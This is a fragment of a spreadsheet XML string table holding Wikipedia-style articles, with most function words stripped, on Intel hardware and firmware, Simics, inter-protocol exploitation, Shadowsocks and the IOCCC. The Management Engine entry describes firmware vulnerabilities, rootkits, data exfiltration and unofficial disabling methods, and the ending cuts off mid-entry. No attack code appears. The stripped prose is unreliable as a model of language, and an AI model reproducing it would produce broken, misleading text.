  </si>
  <si>
    <t>Intel Cascade Cipher</t>
  </si>
  <si>
    <t>cryptography, intel cascaded cipher high bandwidth block cipher, used optional component output content protection scheme microsoft windows vista operating system. cipher based advanced encryption standard (aes) operating counter mode, used generating keys, 3-round version serpent encrypting actual content. cascaded cipher subject open peer review process. license using cascaded cipher required intel corporation. description cascaded cipher specifications currently available intel site academic journals. description structure cipher appears patent application. case, patent application describes inventive steps claimed inventors, specification cipher intended used protect content windows vista. there embodiments cipher described patent application. ctr-ecb mode counter-electronic codebook mode, cascaded cipher uses full strength aes-128 counter mode generate secure stream supplies key-stream reduced round serpent electronic codebook mode encrypt plaintext block. increase performance, inner stream block reused several times encrypt multiple blocks. ctr-ctr mode counter-counter mode, cascaded cipher uses full-strength aes-128 counter mode generate secure stream supplies key-stream reduced round serpent also operating counter mode encrypt plaintext block. increase performance, inner stream block reused several times encrypt multiple blocks. security microsoft document "output content protection windows vista", claimed that: "the security level achieved typical video data estimated approaching regular aes. this assertion tested intel putting cascaded cipher cryptography community security assessment break it." security system requires impossible recover currently active inner output reduced round serpent encrypted video stream. furthermore, security method highly sensitive number rounds used serpent, mode operation described patent application, number times inner reused. references "method apparatus increasing speed cryptographic processing". patent application #20060126843. retrieved 2007-01-13. "output content protection windows vista" (microsoft word document). microsoft. 2005-04-27. retrieved 2007-01-13.</t>
  </si>
  <si>
    <t>Intel Management Engine</t>
  </si>
  <si>
    <t>intel management engine (me), also known intel manageability engine, autonomous subsystem incorporated virtually intel's processor chipsets since 2008. located platform controller modern intel motherboards. intel management engine always runs long motherboard receiving power, even computer turned off. this issue mitigated deployment hardware device, able disconnect mains power. intel's main competitor incorporated equivalent secure technology (formally called platform security processor) virtually post-2013 cpus. difference intel management engine often confused intel (intel active management technology). runs available processors vpro. gives device owners remote administration computer, powering off, reinstalling operating system. however, built intel chipsets since 2008, amt. while unprovisioned owner, official, documented disable design subsystem primarily consists proprietary firmware running separate microprocessor performs tasks boot-up, computer running, asleep. long chipset connected current (via battery power supply), continues even system turned off. intel claims required provide full performance. exact workings largely undocumented code obfuscated using confidential huffman tables stored directly hardware, firmware contain information necessary decode contents. hardware starting based intel quark x86-based 32-bit runs minix operating system. firmware stored partition bios flash, using embedded flash file system (effs). previous versions based core, management engine running threadx rtos. versions used arctangent-a4 (32-bit instructions) whereas versions used newer arcompact (mixed 16-bit instruction architecture). starting 7.1, processor could also execute signed java applets. address out-of-band management interface, direct access ethernet controller; portion ethernet traffic diverted even reaching host's operating system, support exists various ethernet controllers, exported made configurable management component transport protocol (mctp). also communicates host interface. under linux, communication host done /dev/mei /dev/mei0.until release nehalem processors, usually embedded motherboard's northbridge, following memory controller (mch) layout. with newer intel architectures (intel series onwards), integrated platform controller (pch). firmware intel's current terminology 2017, several firmware sets converged security manageability engine (csme)(need updated, latest document(#635338 v1.0 p.#6) described. means firmware name contains sien). prior version csme called intel management engine bios extension (intel mebx). management engine (me) mainstream chipsets server platform services (sps) server chipsets socs trusted execution engine (txe) tablet/embedded/low powerthe russian company positive technologies (dmitry sklyarov) found firmware version runs minix modules active management technology (amt) intel boot guard (ibg) secure boot quiet system technology (qst), formerly known advanced speed control (afsc), provides support acoustically-optimized speed control, monitoring temperature, voltage, current speed sensors provided chipset, devices present motherboard. communication firmware subsystem documented available official software development (sdk). protected audio video path intel anti-theft technology (at), discontinued 2015. serial (sol) intel platform trust technology (ptt), firmware-based trusted platform module (tpm) near field communication, middleware readers vendors access cards provide secure element access, found later versions. security vulnerabilities several weaknesses found 2017, intel confirmed remote elevation privilege (sa-00075) management technology. every intel platform provisioned intel standard manageability, active management technology, small business technology, nehalem 2008 kaby lake 2017 remotely exploitable security hole several ways disable without authorization could allow me's functions sabotaged found. additional major security flaws affecting large number computers incorporating trusted execution engine (txe), server platform services (sps) firmware, skylake 2015 coffee lake 2017, confirmed intel november 2017 (sa-00086). unlike sa-00075, even present absent, provisioned "disabled" known unofficial methods. july 2018 another vulnerabilities disclosed (sa-00112). september 2018, another vulnerability published (sa-00125). ring rootkit ring rootkit demonstrated invisible things chipset; work later chipset intel implemented additional protections. exploit worked remapping normally protected memory region (top ram) reserved rootkit could installed regardless whether present enabled system, chipset always contains coprocessor. (the "−3" designation chosen coprocessor works even system state, thus considered layer system management mode rootkits.) vulnerable chipset, keystroke logger me-based rootkit demonstrated patrick stewin. zero-touch provisioning another security evaluation vassilios ververis showed serious weaknesses gm45 chipset implementation. particular, criticized transmitting unencrypted passwords provisioning mode redirection serial features used. also found "zero touch" provisioning mode (ztc) still enabled even appears disabled bios. euros, ververis purchased daddy certificate accepted firmware allows remote "zero touch" provisioning (possibly unsuspecting) machines, broadcast hello packets would-be configuration servers. sa-00075 (a.k.a. silent silent) 2017, intel confirmed many computers unpatched critical privilege escalation vulnerability (cve-2017-5689). vulnerability, nicknamed "silent silent" researchers reported intel, affects numerous laptops, desktops servers sold dell, fujitsu, hewlett-packard (later hewlett packard enterprise inc.), intel, lenovo, possibly others. those researchers claimed affects systems made 2010 later. other reports claimed also affects systems made long 2008. vulnerability described giving remote attackers: "full control affected machines, including ability read modify everything. used install persistent malware (possibly firmware), read modify data." platinum june 2017, platinum cybercrime group became notable exploiting serial (sol) capabilities perform data exfiltration stolen documents. disabled default, must enabled exploit vulnerability. sa-00086 some months previous bugs, subsequent warnings eff, security firm positive technologies claimed developed working exploit. november, 2017 intel confirmed number serious flaws found management engine (mainstream), trusted execution engine (tablet/mobile), server platform services (high server) firmware, released "critical firmware update". essentially every intel-based computer last several years, including desktops servers, found vulnerable security compromised, although potential routes exploitation entirely known. possible patch problems operating system, firmware (uefi, bios) update motherboard required, anticipated take quite time many individual manufacturers accomplish, ever would many systems. affected systems intel atom c3000 family intel atom apollo lake e3900 series intel celeron series intel core (i3, 1st, 2nd, 3rd, 4th, 5th, 6th, 7th, generation intel pentium apollo lake intel xeon e3-1200 product family intel xeon scalable family intel xeon family mitigation none known unofficial methods disable prevent exploitation vulnerability. firmware update vendor required. however, discovered vulnerability note firmware updates fully effective either, attacker access firmware region simply flash old, vulnerable version exploit bug. sa-00112 july 2018 intel announced three vulnerabilities (cve-2018-3628, cve-2018-3629, cve-2018-3632) discovered patch csme firmware would required. intel indicated would patch generation core processors earlier despite chips chipsets back intel core vpro intel centrino vpro affected. however intel must enabled provisioned vulnerability exist. assertions backdoor critics like electronic frontier foundation (eff), libreboot developers, security expert damien zammit accused backdoor privacy concern. zammit stresses full access memory (without owner-controlled cores knowledge), full access tcp/ip stack send receive network packets independently operating system, thus bypassing firewall.intel responded saying "intel back doors products products give intel control access computing systems without explicit permission user." "intel design backdoors access products. recent reports claiming otherwise misinformed blatantly false. intel participate efforts decrease security technology."in context criticism intel secure technology pointed national security agency (nsa) budget request 2013 contained sigint enabling project goal "insert vulnerabilities commercial encryption systems, systems, conjectured intel secure technology might part program. disabling normally possible user disable some undocumented methods discovered, methods supported intel. me's security architecture designed prevent disabling, thus possibility considered intel security vulnerability. example, virus could abuse make computer lose functionality typical end-user expects, ability play media drm. hand, malicious actor could remotely compromise system. strictly speaking, none known methods disable completely, since required booting main cpu. known methods merely make abnormal states soon boot, seems working functionality. still physically connected system microprocessor continues execute code. undocumented methods firmware neutralization 2016, me_cleaner project found me's integrity verification broken. supposed detect tampered and, case, shut forcibly minutes system start. this prevents compromised system running undetected, allows owner issue flashing valid version firmware grace period. project found out, making unauthorized changes firmware, possible force abnormal error state prevented triggering shutdown even large parts firmware overwritten thus made inoperable. "high assurance platform" mode august 2017, positive technologies (dmitry sklyarov) published method disable undocumented built-in mode. intel confirmed contains switch enable government authorities make high-assurance platform (hap) mode boot. this mode disables me's functions, intended available machines produced specific purchasers like government; however, machines sold retail market made activate switch. manipulation quickly incorporated me_cleaner project. commercial disablement from late 2017 several laptop vendors announced intentions ship laptops intel disabled end-users disable manually: purism previously petitioned intel sell processors without release source code, calling threat users' digital rights". march 2017, purism announced neutralized erasing majority code flash memory. announced october 2017 batches librem line laptops running pureos ship neutralized, additionally disable operation bit. updates existing librem laptops also announced. november, system76 announced plan disable recent machines ship pop!_os bit. december, dell began showing certain laptops website offered "systems management" option "intel vpro inoperable, custom order" additional fee. dell announced publicly explained methods used. response press requests, dell stated systems offered quite while, general public, found website inadvertently. laptops available custom order military, government intelligence agencies. they specifically designed covert operations, providing robust case "stealth" operating mode kill switch disables display, lights, speaker, wireless technology. march 2018, tuxedo computers, german company specializes operating systems linux kernel, announced option bios system disable february 2021 nitrokey, german company specialized producing security tokens, announced nitropc, device identical purism's librem mini. effectiveness vulnerabilities neither methods disable discovered turned effective countermeasure sa-00086 vulnerability. this vulnerability early-loaded module essential boot main cpu. reactions google 2017, google attempting eliminate proprietary firmware servers found hurdle that. processor vendors shortly sa-00086 patched, vendors processor mainboards started shipping bios updates allow disabling secure technology, subsystem similar function also platform security processor trustzone intel versions intel vpro meltdown (security vulnerability) microsoft pluton next-generation secure computing base samsung knox spectre (security vulnerability) trusted computing trusted execution technology trusted platform module references external links intel-sa-00086 security vulnerability detection tool behind scenes intel security manageability engine</t>
  </si>
  <si>
    <t>Intel Rapid Storage Technology</t>
  </si>
  <si>
    <t>intel rapid storage technology (rst), 2010 called matrix raid, firmware-based raid solution built wide range intel chipsets. 2020, includes raid system capable raid levels block level caching accelerator ("smart response technology") support write-back write-through modes speed data protection disk raid array, support intelligent caching, speedy recovery certain issues, express based drives. intel comes variants, desktops, rste (vroc part intel rste) enterprise scenarios, although many chipsets, user choose variants operate correctly.intel provided combination firmware, chipset capabilities, software. such, chipset, firmware included bios, software installed user, must compatible versions. online forums communities exist compare benefits different versions these, advise best compatibility specified hardware, modify existing firmware software allow optimal combinations updates beyond provided hardware manufacturers.like raid (redundant array independent disks), intel raid employs physical hard disks operating system treat single disk, order increase redundancy avoids data loss (except raid and/or increase speed data written and/or read disk. intel raid provide raid levels. allows different areas (e.g. partitions logical volumes) disk assigned different raid devices, unlike raid controllers. intel recommends critical applications data raid volume, redundancy protect data loss. raid volume matrix raid provides fast access large files data loss critical issue speed examples include video editing, swap files, files backed intel matrix raid, intel rapid raid, intel smart response technology together described intel rapid storage technology. operating system support "rapid storage technology" (rst), including creation raid volumes, works windows newer versions microsoft windows. older "intel matrix raid" supported microsoft windows linux supports matrix raid rapid storage technology (rst) device mapper, dmraid tool, raid linux raid, mdadm tool, raid raid volumes must done using option matrix storage manager, configuration done dm-raid md-raid.freebsd midnightbsd support intel matrix raid using "ataraid" driver, managed atacontrol command. however, older versions freebsd critical reliability issues include array device renaming disk array replaced, array considered healthy machine reboot/crashes array rebuild, kernel panics disk lost removed bus. some problems, experienced combination, could result loss entire array (even case raid vmware esxi support raid function intel matrix raid based intel ichxr controllers.pgpdisk support intel matrix raid based intel ichxr, support standalone drives "raid" mode enabled motherboard. matrix storage manager option intel matrix storage manager (imsm) option part matrix raid used bios create raid arrays. 2014 intel uses "rapid storage technology" -"option rom"- chipsets, dropping "matrix" name. intel document notes matrix raid storage changed (rapid storage technology) beginning version 9.5.there several driver versions: since release 11.2.0.0000, trim commands read windows raid drivers made series chipsets. there raid mode trim support drivers older chipsets.intel states support added chipset version 11.6.0.0000 after.on series chipsets modification bios, allow trim support series chipset.for chipset, certain motherboard manufacturers added raid roms bios, rst-e rom. enterprise version, called rst-e. with added bios, allows trim function pass controller trim drives raid enabled. this workaround needed rst-e driver version shipped passed trim commands raid array without modifications rst-e rom. there support trim rst-e version raid enabled rst-e driver version less 3.8. possible bios enable trim passthrough raid mode using driver.the newest option version series rom, used motherboard manufacturers chipset bios, injected bios modded code, mfg's added switch, added rste raid option bios, needs code added trim commands sent, inject replace rste option boards contain switch, trim dysfunctional. there modded series option roms (legacy) available certain bios modding sites made functional chipsets. when booting bios environment (legacy) efi, option used. when booting true uefi environment option used satadriver version takes over. bios mode legacy/bios booting csmcore. true uefi mode controlled satadriver bios. intel raid firmware motherboard bios used create raid array. note: drivers used raid also single drive contains ahci driver. there version 12.5.0.1066 driver, cause trim commands pass raid driver drives. trim disabled using driver. rapid storage technology enterprise (intel rste) intel rapid storage technology enterprise (intel rste) provides performance reliability supported systems equipped serial (sata) devices, serial attached scsi (sas) devices, and/or solid state drives (ssds) enable optimal enterprise storage solution. main difference rste used desktop systems rste mostly used server systems. supports regular sata controllers desktop systems. bios motherboard rste feature user cannot install intel rapid storage technology software (error message: this platform supported). user install rste software. there several option versions: 2010, intel announced rtse branding would replaced, rste consolidated intel's vroc (virtual raid cpu) product line. intel vroc (virtual raid cpu) intel vroc part intel rste. this mostly designed nvme ssd's mind directly attached intel xeon scalable processors. full functionality uses newer intel technology called intel (intel volume management device). intel technology intel xeon scalable processors series used provide hot-plug, surprise-removal, management nvme ssd's server usage. intel vroc targeted linux operating systems, microsoft windows server. client pc's (with intel core, pentium celeron processors) intel still advised software package use. also non-standard raid levels mdadm references freeman (may 2004). "storage basics: choosing raid controller". enterprise storage forum.com. archived original june 2008. retrieved february 2008. external links "intel rapid storage technology". support download website. retrieved november 2011. https://win-raid.com forum specializing intel similar soft raid, choice driver/rom/orom, modification roms.</t>
  </si>
  <si>
    <t>Intel Turbo Boost</t>
  </si>
  <si>
    <t>intel turbo boost intel's trade name central processing units (cpus) dynamic frequency scaling feature automatically raises certain versions operating frequency demanding tasks running, thus enabling higher resulting performance. frequency accelerated operating system requests highest performance state processor. processor performance states defined advanced configuration power interface (acpi) specification, open standard supported major operating systems; additional software drivers required support technology. design concept behind turbo boost commonly referred "dynamic overclocking".when workload processor calls faster performance, processor's clock increase operating frequency regular increments required meet demand. increased clock rate limited processor's power, current, thermal limits, number cores currently use, maximum frequency active cores.turbo-boost-enabled processors core core core core xeon series manufactured since 2008, particularly, based nehalem, later microarchitectures. support across cpus frequency increases occur increments nehalem processors sandy bridge, bridge, haswell skylake processors. when electrical thermal limits exceeded, operating frequency automatically decreases decrements processor operating within design limits. turbo boost introduced 2011 sandy bridge microarchitecture, intel turbo boost introduced 2016 broadwell-e microarchitecture.a feature turbo boost introduced time windows different levels power limits, processor boost higher frequency seconds. these limits configurable software unlocked processors. some motherboard vendors intentionally values higher intel's default performance, causing processor exceed thermal design power (tdp).some intel core processors newer intel core processors (e.g. 10th desktop core support intel turbo boost technology. newer version windows linux kernel support intel turbo boost technology. history intel november 2008 white paper discusses "turbo boost" technology feature incorporated nehalem-based processors released month.a similar feature called intel dynamic acceleration (ida) available many core based centrino platforms. this feature receive marketing treatment given turbo boost. intel dynamic acceleration dynamically changed core frequency function number active cores. when operating system instructed active cores enter sleep state using advanced configuration power interface (acpi), active core(s) dynamically accelerated higher frequency. intel turbo boost technology monitor, utility, could used monitor turbo boost; utility reached end-of-life state longer supporting intel processors released 2013, longer available. also powertune turbo core cool'n'quiet dynamic frequency scaling powernow! speedstep turbo button references external links intel turbo boost technology intel program graphically show turbo boost intel® turbo boost technology monitor overview turbo boost reporting tool linux evaluation intel core turbo boost feature, james charles, preet jassi, ananth narayan abbas sadat alexandra fedorova</t>
  </si>
  <si>
    <t>Intel iAPX 432</t>
  </si>
  <si>
    <t>iapx (intel advanced performance architecture) discontinued computer architecture introduced 1981. intel's first 32-bit processor design. main processor architecture, general data processor, implemented separate integrated circuits, technical limitations time. although early 8086, 80186 80286-based systems manuals also used iapx prefix marketing reasons, iapx 8086 processor lines completely separate designs completely different instruction sets. project started 1975 8800 (after 8008 8080) intended intel's major design 1980s. unlike 8086, designed following year successor 8080, iapx radical departure intel's previous designs meant different market niche, completely unrelated 8080 product lines. iapx project considered commercial failure intel, discontinued 1986. description iapx referred "micromainframe", designed programmed entirely high-level languages. instruction architecture also entirely significant departure intel's previous 8008 8080 processors iapx programming model stack machine visible general-purpose registers. supports object-oriented programming, garbage collection multitasking well conventional memory management directly hardware microcode. direct support various data structures also intended allow modern operating systems implemented using less program code ordinary processors. intel imax discontinued operating system 432, written entirely ada, also intended primary language application programming. aspects, seen high-level language computer architecture. these properties features resulted hardware microcode design complex processors era, especially microprocessors. however, internal external buses (mostly) wider 16-bit, and, like 32-bit microprocessors (such 68000 32016), 32-bit arithmetical instructions implemented 16-bit alu, random logic microcode kinds sequential logic. iapx enlarged address space 8080 also limited fact linear addressing data could still 16-bit offsets, somewhat akin intel's first 8086-based designs, including contemporary 80286 (the 32-bit segment offsets 80386 architecture described publicly detail 1984).using semiconductor technology day, intel's engineers able translate design efficient first implementation. along lack optimization premature compiler, contributed rather slow expensive computer systems, performing typical benchmarks roughly speed 80286 chip clock frequency early 1982). this initial performance rather low-profile low-priced 8086 line probably main reason intel's plan replace latter (later known x86) iapx failed. although engineers ways improve next generation design, iapx capability architecture started regarded implementation overhead rather simplifying support intended be.originally designed clock frequencies mhz, actual devices sold specified maximum clock speeds mhz, mhz, peak performance million instructions second mhz. history development intel's project started 1976, year 8-bit intel 8080 completed year 16-bit 8086 project began. project initially named 8800, next step beyond existing intel 8008 8080 microprocessors. this became step. instruction sets 8-bit processors well fitted typical algol-like compiled languages. however, major problem small native addressing ranges, 8008 8080, small many complex software systems without using kind bank switching, memory segmentation, similar mechanism (which built 8086, years later on). intel aimed build sophisticated complete system chips, functionally equal better best 32-bit minicomputers mainframes requiring entire cabinets older chips. this system would support multiprocessors, modular expansion, fault tolerance, advanced operating systems, advanced programming languages, large applications, ultra reliability, ultra security. architecture would address needs intel's customers decade.the iapx development team managed bill lattin, justin rattner lead engineer (although source states fred pollack lead engineer). (rattner would later become intel.) initially team worked santa clara, march 1977 lattin team engineers moved intel's site portland. pollack later specialized superscalarity became lead architect i686 chip intel pentium pro.it soon became clear would take several years many engineers design this. would similarly take several years progress moore's law, improved chip manufacturing could dense chips. meanwhile, intel urgently needed simpler interim product meet immediate competition motorola, zilog, national semiconductor. intel began rushed project design 8086 low-risk incremental evolution 8080, using separate design team. mass-market 8086 shipped 1978. 8086 designed backward-compatible 8080 sense 8080 assembly language could mapped 8086 architecture using special assembler. existing 8080 assembly source code (albeit executable code) thereby made upward compatible 8086 degree. contrast, software compatibility migration requirements. architects total freedom novel design scratch, using whatever techniques guessed would best large-scale systems software. they applied fashionable computer science concepts universities, particularly capability machines, object-oriented programming, high-level cisc machines, ada, densely encoded instructions. this ambitious novel features made chip larger complex. chip's complexity limited clock speed lengthened design schedule. core design main processor termed general data processor (gdp) built integrated circuits: (the 43201) fetch decode instructions, (the 43202) execute them. most systems would also include 43203 interface processor (ip) operated channel controller i/o, attached processor (ap), conventional intel 8086 provided "processing power subsystem".these largest designs era. two-chip combined count approximately 97,000 transistors single chip approximately 49,000. comparison, motorola 68000 (introduced 1979) approximately 40,000 transistors.in 1983, intel released additional integrated circuits iapx interconnect architecture: 43204 interface unit (biu) 43205 memory control unit (mcu). these chips allowed nearly glueless multiprocessor systems nodes. project's failures some innovative features iapx detrimental good performance. many cases, iapx significantly slower instruction throughput conventional microprocessors era, national semiconductor 32016, motorola 68010 intel 80286. problem two-chip implementation limited speed motherboard's electrical wiring. larger issue capability architecture needed large associative caches efficiently, chips room left that. instruction also used bit-aligned variable-length instructions instead usual semi-fixed byte word-aligned formats used majority computer designs. instruction decoding therefore complex designs. although hamper performance itself, used additional transistors (mainly large barrel shifter) design already lacking space transistors caches, wider buses performance oriented features. addition, designed support fault-tolerant systems, time held wait states. another major problem immature untuned compiler. used high-cost object-oriented instructions every case, instead faster scalar instructions would made sense instance iapx included expensive inter-module procedure call instruction, compiler used calls, despite existence much faster branch link instructions. another slow call enter_environment, memory protection. compiler every single variable system, even variables used inside existing environment checked. make matters worse, data passed procedures always passed value-return rather reference. when running dhrystone benchmark, parameter passing took times longer computations combined.according york times, "the i432 times slowly competitor, motorola 68000". impact similar designs iapx first systems implement ieee-754 standard floating-point arithmetic.an outcome failure microprocessor designers concluded object support chip leads complex design invariably slowly, often cited counter-example proponents risc designs. however, hold support primary problem 432, implementation shortcomings (especially compiler) mentioned would made design slow. since iapx attempt similar design, rekursiv processor, although inmos transputer's process support similar fast.intel spent considerable time, money, mindshare 432, skilled team devoted unwilling abandon entirely failure marketplace. architect—glenford myers—was brought produce entirely architecture implementation core processor, would built joint intel/siemens project (later biin), resulting i960-series processors. i960 risc subset became popular time embedded processor market, high-end 960mc tagged-memory 960mx marketed military applications. according york times, intel's collaboration merced processor (later known itanium) company's comeback attempt high-end market. architecture iapx instructions variable length, bits. unusually, byte-aligned, contain numbers bits directly follow without regard byte boundaries. object-oriented memory capabilities iapx hardware microcode support object-oriented programming capability-based addressing. system uses segmented memory, segments each, providing total virtual address space bytes. physical address space bytes mb). programs able reference data instructions address; instead must specify segment offset within segment. segments referenced access descriptors (ads), provide index system object table rights (capabilities) governing accesses segment. segments "access segments", contain access descriptors, "data segments" cannot contain ads. hardware microcode rigidly enforce distinction data access segments, allow software treat data access descriptors, vice versa. system-defined objects consist either single access segment, access segment data segment. system-defined segments contain data access descriptors system-defined data designated offsets, though operating system user software extend additional data. each system object type field checked microcode, port object cannot used carrier object needed. user programs define object types full benefit hardware type checking, type control objects (tcos). release iapx architecture, system-defined object typically consisted access segment, optionally (depending object type) data segment specified access descriptor fixed offset within access segment. release architecture, order improve performance, access segments data segments combined single segments split access part data part 0–64 each. this reduced number object table lookups dramatically, doubled maximum virtual address space.the iapx432 recognizes fourteen types predefined system objects:: pp.1-11–1-12 instruction object contains executable instructions domain object represents program module contains references subroutines data context object represents context process execution type-definition object represents software-defined object type type-control object represents type-specific privilege object table identifies system's collection active object descriptors storage resource object represents free storage pool physical storage object identifies free storage blocks memory storage claim object limits storage allocated associated storage resource objects process object identifies running process port object represents port message queue interprocess communication carrier carriers carry messages ports processor contains state information processor system processor communication object used interprocessor communication garbage collection software running need explicitly deallocate objects longer needed. instead, microcode implements part marking portion edsger dijkstra's on-the-fly parallel garbage collection algorithm mark-and-sweep style collector). entries system object table contain bits used mark object white, black, grey needed collector. imax operating system includes software portion garbage collector. instruction format executable instructions contained within system "instruction object".: p.7-3 instructions bit-aligned, 16-bit displacement instruction object allows object contain 65,536 bits (8,192 bytes) instructions. instructions consist operator, consisting class opcode, zero three operand references. "the fields organized present information processor sequence required decoding". more frequently used operators encoded using fewer bits.: p.7-6 instruction begins class field indicates number operands, called order instruction, length operand. this optionally followed format field describes operands operands format present). then come zero three operands, described format. instruction terminated opcode, (some classes contain instruction therefore opcode). "the format field permits appear programmer zero-, one-, two-, three-address architecture." format field indicates operand data reference, next-to-top element operand stack.: pp.7-3–7-5 also iapx, iapx name notes references external links iapx manuals bitsavers.org computer history museum intel iapx432 micromainframe contains list intel documentation associated iapx 432, list hardware part numbers list papers.</t>
  </si>
  <si>
    <t>Simics</t>
  </si>
  <si>
    <t>simics full-system simulator virtual platform used unchanged production binaries target hardware. simics originally developed swedish institute computer science (sics), spun virtutech commercial development 1998. virtutech acquired intel 2010. currently, simics provided intel public release sold commercially wind river systems, past subsidiary intel. simics contains instruction simulators hardware models, used simulate systems alpha, ia-64, (32- 64-bit), mips (32- 64-bit), msp430, powerpc (32- 64-bit), sparc-v8 x86-64 cpus. many operating systems various varieties simulated hardware, including ms-dos, windows, vxworks, ose, solaris, freebsd, linux, qnx, rtems, uefi. netbsd amd64 port initially developed using simics public release chip. purpose simulation simics often develop software particular type hardware without requiring access precise hardware, using simics virtual platform. this applied pre-release pre-silicon software development future hardware, well existing hardware. intel uses simics provide ecosystem access future platform months years ahead hardware launch.the current version simics released publicly 2019. simics runs 64-bit intel architecture machines running microsoft windows linux (32-bit support dropped release simics since 64-bit provides significant performance advantages universally available current hardware). previous version, simics released 2015.simics ability execute system forward reverse direction. reverse debugging illuminate exceptional condition occurred. when executing linux reverse using simics, previously deleted files reappear deletion point passed reverse scrolling graphical display console updates occur backwards well. simics built high performance execution full-system models, uses binary translation hardware-assisted virtualization increase simulation speed. natively multithreaded simulate multiple target guest) processors boards using multiple host threads. used simulations containing hundreds target processors. also fastsim, instruction-set simulator system models ovpsim, full system simulation framework free non-commercial use, comes open source models platforms linux, android, many operating systems. qemu, open-source program full-system simulation simics, including using hardware virtualization accelerate execution x86. spim, mips processor simulator designed r2000, r3000 etc. instruction simulator references external links simics public release intel simics product page wind river</t>
  </si>
  <si>
    <t>Inter-protocol exploitation</t>
  </si>
  <si>
    <t>inter-protocol exploitation class security vulnerabilities takes advantage interactions communication protocols, example protocols used internet. commonly discussed context hypertext transfer protocol (http). this attack uses potential different protocols meaningfully communicating commands data. popularized 2007 publicly described research year. general class attacks refers known since least 1994 (see security considerations section 1738). internet protocol implementations allow possibility encapsulating exploit code compromise remote program uses different protocol. inter-protocol exploitation utilize inter-protocol communication establish preconditions launching inter-protocol exploit. example, process could negotiate initial authentication communication vulnerability password parsing. inter-protocol exploitation protocol attacks service running different protocol. this legacy problem specifications protocols take consideration attack type. technical details protocols involved vulnerability termed carrier target. carrier encapsulates commands and/or data. target protocol used communication intended victim service. inter-protocol communication successful carrier protocol encapsulate commands and/or data sufficiently meaningfully communicate target service. preconditions need successful communication across protocols: encapsulation error tolerance. carrier protocol must encapsulate data commands manner target protocol understand. highly likely resulting data stream induce parsing errors target protocol. target protocol must sufficiently forgiving errors. during inter-protocol connection likely percentage communication invalid cause errors. meet precondition, target protocol implementation must continue processing despite errors. current implications major points concern potential attack vector reach firewalls dmzs. inter-protocol exploits transmitted http launched browsers internal subnet. important point browser exploited conventional means. example javascript delivered http communicating protocol. known examples vulnerability also demonstrated files constructed valid html code image time. references external links https://www.theregister.co.uk/2007/06/27/wade_alcorn_metasploit_interview/ marco ramilli blog post explains hacking images technique.</t>
  </si>
  <si>
    <t>Interactive application security testing</t>
  </si>
  <si>
    <t>interactive application security testing (iast) security testing method detects software vulnerabilities interaction program coupled observation sensors. distinct static application security testing, interact program, dynamic application security testing, considers program black box. considered both. references</t>
  </si>
  <si>
    <t>Shadowsocks</t>
  </si>
  <si>
    <t>shadowsocks free open-source encryption protocol project, widely used china circumvent internet censorship. created 2012 chinese programmer named "clowwindy", multiple implementations protocol made available since. shadowsocks proxy own, (typically) client software help connect third-party socks5 proxy, similar secure shell (ssh) tunnel. once connected, internet traffic directed proxy. unlike tunnel, shadowsocks also proxy user datagram protocol (udp) traffic. takedown august 2015, "clowwindy" announced github thread contacted police could longer maintain project. code project subsequently branched removal notice. three days later, august, another proxy application, goagent, also github repository removed. removal projects media's attention, news outlets speculating possible connection takedowns distributed-denial-of-service attack targeting github happened several days later. danny o'brien, electronic frontier foundation, published statement matter.despite takedown, collaborators project continued development project. server implementations original python implementation still installed (package manager), contents github repository removed. other server implementations include rust, using libev event loop library; gui; perl. perl implementations updated regularly abandoned. client implementations server implementations listed also support operating client mode. there also client-only implementations available windows (shadowsocks-win), macos (shadowsocksx-ng), android (shadowsocks-android), (wingy). many clients, including shadowsocks-win shadowsocks-android, support redirecting system traffic shadowsocks, applications explicitly configured allowing shadowsocks used similarly vpn. application support proxy servers, proxifier used redirect application shadowsocks client. some proxifiers, proxycap, support shadowsocks directly, thus avoiding need shadowsocks client, require client. net::shadowsocks net::shadowsocks name perl implementation shadowsocks protocol client server available cpan. shadowsocksr shadowsocksr fork original shadowsocks project, claimed superior terms security stability. upon release, found violate license source code client available. also criticized solution alleged security issues source project. shadowsocks currently development, development shadowsocksr stopped. similar projects shadowsocks similar project's pluggable transport (pt) idea. makes hard internet service providers detect traffic. they also socks proxy interface. whereas shadowsocks simpler, obfs4 used obfuscated. unlike obfs4, shadowsocks resistant active probing. similar shadowsocks obfs3. also great firewall internet censorship china outline references external links official website</t>
  </si>
  <si>
    <t>International Obfuscated C Code Contest</t>
  </si>
  <si>
    <t>international obfuscated code contest (abbreviated ioccc) computer programming contest creatively obfuscated code. held annually, described "celebrating [c's] syntactical opaqueness". winning code 27th contest, held 2020, released july 2020. previous contests held years 1984–1996, 1998, 2000, 2001, 2004–2006, 2011–2015 2018–2020. entries evaluated anonymously panel judges. judging process documented competition guidelines consists elimination rounds. tradition, information given total number entries competition. winning entries awarded category, "worst abuse preprocessor" "most erratic behavior", announced official ioccc website. contest states announced ioccc website reward winning. history ioccc started landon curt noll larry bassel 1984 employed national semiconductor's genix porting group. idea contest came compared notes poorly written code fix, notably bourne shell, used macros emulate algol syntax, buggy version finger bsd. contest topic quiz question 1993 computer bowl. after hiatus five years starting 2006, contest returned 2011.compared programming contests, ioccc described "not serious" michael swaine, editor dobb's journal. rules each year, rules contest published ioccc website. material published creative commons license by-sa unported. rules vary year year posted guidelines attempt convey spirit rules. hacking contest rules tradition. landon curt noll, 2011 rules often deliberately written loopholes contestants encouraged find abuse. entries take advantage loopholes cause rules following year's contest adjusted. obfuscations employed entries often employ strange unusual tricks, using preprocessor things designed cases "spectacularly", according dobbs, entry creating 11-bit preprocessor), avoiding commonly used constructs programming language favor much obscure ways achieving thing. contributions included source code formatted resemble images, text, etc., manner ascii art, preprocessor redefinitions make code harder read, self-modifying code. several years, entry submitted required definition rules next year. this regarded high honor. example world's shortest self-reproducing program. entry program designed output source code, zero bytes source code. when program ran, printed zero bytes, equivalent source code.in effort take obfuscation extremes, contestants produced programs skirt around edges standards, result constructs trigger rarely used code path combinations compilers. result, several past entries compile directly modern compiler, cause crashes. examples within code size limit kilobytes, contestants managed complicated things 2004 winner turned operating system. toledo nanochess toledo nanochess chess engine created mexican software developer oscar toledo gutiérrez, five-time winner ioccc. accordance ioccc rules, 1255 characters long. author claims world's smallest chess program written source code toledo nanochess engines available. because toledo nanochess based toledo's winning entry 18th ioccc (best game), heavily obfuscated.on february 2014, author published book toledo nanochess: commented source code, contains fully commented source code.as february 2010, appears chess engines written less kilobytes able play full legal chess moves, along micro-max dutch physicist muller. 2014 kilobyte barrier broken super micro chess derivative micro-max totaling characters (spaces newlines included). there also smaller version toledo's engine, toledo picochess, consisting non-blank characters. source code excerpt below 1988 entry calculates looking area: (this entry written work correctly ansi without changes.) flight simulator another example following flight simulator, winner 1998 